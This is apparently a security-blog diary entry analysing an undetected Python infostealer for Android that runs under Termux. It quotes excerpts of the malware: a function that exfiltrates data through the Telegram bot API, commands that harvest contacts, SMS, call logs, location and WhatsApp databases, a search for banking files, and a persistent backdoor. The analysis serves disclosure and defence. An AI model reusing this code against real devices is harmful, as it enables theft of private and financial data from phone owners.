My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 27th - Oct 31st 2025

Infostealer Targeting Android Devices

Published: 2025-10-23. Last Updated: 2025-10-23 12:09:38 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Infostealers landscape exploded in 2024 and they remain a top threat today. If Windows remains a nice target (read: Attackers' favorite), I spotted an Infostealer targeting Android devices. This sounds logical that attackers pay attention to our beloved mobile devices because all our life is stored on them.

The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.

From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."

Sounds great to run Python code.

Once Termux is installed, add the Python package:

$ pkg install python

The infostealer is classic and exfiltrate data through a Telegram channel:

def send_telegram(msg):
    try:
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
        data = {"chat_id": CHAT_ID, "text": msg}
        requests.post(url, data=data, timeout=10)
    except: pass

But, how can the malware access Android data? Termux comes with a suite a command-line tools that provide juicy information. For example, termux-contact-list[3] returns a list of contacts stored in the phone in JSON:

[
  {
    "id": 1,
    "name": "Alice Dupont",
    "phone_numbers": [
      "+32470123456",
      "+3221234567"
    ],
    "emails": [
      "alice.dupont@example.com"
    ]
  },
  {
    "id": 2,
    "name": "Bob Martin",
    "phone_numbers": [
      "+32475123456"
    ],
    "emails": []
  },
  {
    "id": 3,
    "name": "Caroline Smith",
    "phone_numbers": [],
    "emails": [
      "caroline.smith@company.com",
      "c.smith@gmail.com"
    ]
  }
]

The infostealer will collect and exfiltrate the following information:

contacts = subprocess.getoutput('termux-contact-list')
sms = subprocess.getoutput('termux-sms-list')
call_log = subprocess.getoutput('termux-call-log')
location = subprocess.getoutput('termux-location')

The malware tries also to exfiltrate data from apps like Facebook and Whatsapp. How? In the Android ecosystem, Termux is running in a sandbox and has access only to its own $HOME directory:

/data/data/com.termux/files/home

But another tools is provided: termux-setup-storage. That one will allow access to the phone storage through a mapping lile:

/storage/emulated/0/<dir>

Note that the victim will be prompted with a dialog prompt asking right to access data. But they’ll do right?

The malware will try to exfiltrate more data:

fb_paths = [
    '/storage/emulated/0/Android/data/com.facebook.katana/',
    '/storage/emulated/0/Facebook/'
]
wa_paths = [
    '/storage/emulated/0/WhatsApp/Databases/msgstore.db',
    '/storage/emulated/0/WhatsApp/Databases/wa.db',
    '/sdcard/WhatsApp/Databases/msgstore.db'
]
media_paths = [
    '/storage/emulated/0/DCIM/',
    '/storage/emulated/0/Pictures/',
    '/storage/emulated/0/Movies/',
    '/storage/emulated/0/Download/'
]

It will also search for banking related information:

banking_files = []
    for root, dirs, files in os.walk('/storage/emulated/0/'):
        for file in files:
            if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']):
                banking_files.append(os.path.join(root, file))

 Get device info:

device_model = subprocess.getoutput('getprop ro.product.model')
android_version = subprocess.getoutput('getprop ro.build.version.release')
device_name = subprocess.getoutput('getprop ro.product.device')

A backdoor will be installed:

def install_backdoor():
    try:
        backdoor_script = '''
import os, time, requests
while True:
    try:
        os.system("termux-location > /data/data/com.termux/files/home/location.txt")
        time.sleep(300)
    except:
        time.sleep(60)
'''
        with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f:
            f.write(backdoor_script)
            os.system('python3 /data/data/com.termux/files/home/backdoor.py &')
        except: pass

I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!

[1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182
[2] https://termux.dev/en/
[3] https://wiki.termux.com/wiki/Termux-contact-list

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: Exfiltration Termux Android Infostealer Malware Python
0 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 27th - Oct 31st 2025

Comments

Login here to join the discussion.


Top of page
Diary Archives